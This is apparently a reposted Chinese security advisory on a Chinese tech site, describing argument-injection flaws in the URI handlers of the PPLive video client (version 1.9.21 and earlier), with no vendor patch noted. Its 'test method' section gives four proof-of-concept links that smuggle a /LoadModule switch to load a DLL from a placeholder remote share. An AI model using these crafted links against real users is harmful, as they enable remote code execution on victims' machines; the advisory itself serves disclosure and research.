PPLive URI处理器LoadModule参数多个代码执行漏洞 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    影响版本:

    聚力传媒 PPLive <= 1.9.21

    漏洞描述:

    BUGTRAQ ID: 34128PPLive是非常流行的P2P网络视频客户端,

PPLive URI处理器LoadModule参数多个代码执行漏洞

。PPLive的synacast://、Play://、pplsv://和ppvod:// URI处理器在评估命令行参数时没有正确地验证URI参数,如果用户受骗跟随的链接中包含有特制的/LoadModule参数的话,就可能导致Internet Explorer加载远程VNC路径所指定的dll。厂商补丁:

    聚力传媒

    --------

    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

    http://www.pplive.com/

    测试方法:

    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    synacast://www.example.com/?\"%20/LoadModule%20\\example.com\\unc_share\\sh.dll%20\"Play://www.example.com/?\"%20/LoadModule%20\\\\example.com\\unc_share\\sh.dll%20\"pplsv://www.example.com/?\"%20/LoadModule%20\\\\example.com\\unc_share\\sh.dll%20\"ppvod://www.example.com/?\"%20/LoadModule%20\\\\example.com\\unc_share\\sh.dll%20\"

    看昨天的:/Article/200903/36644.html

最新文章